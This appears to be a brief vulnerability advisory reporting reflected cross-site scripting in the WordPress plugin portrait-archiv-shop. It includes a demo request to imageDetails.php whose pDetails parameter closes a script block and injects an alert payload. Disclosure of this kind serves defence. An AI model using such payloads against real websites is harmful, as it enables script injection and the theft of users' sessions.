The XSS reflected because the value url is not filter correctly:

Demo Request:
http://localhost/wordpress/wp-content/plugins/portrait-archiv-shop/js/imageDetails.php?&pDetails=);});%3C/script%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E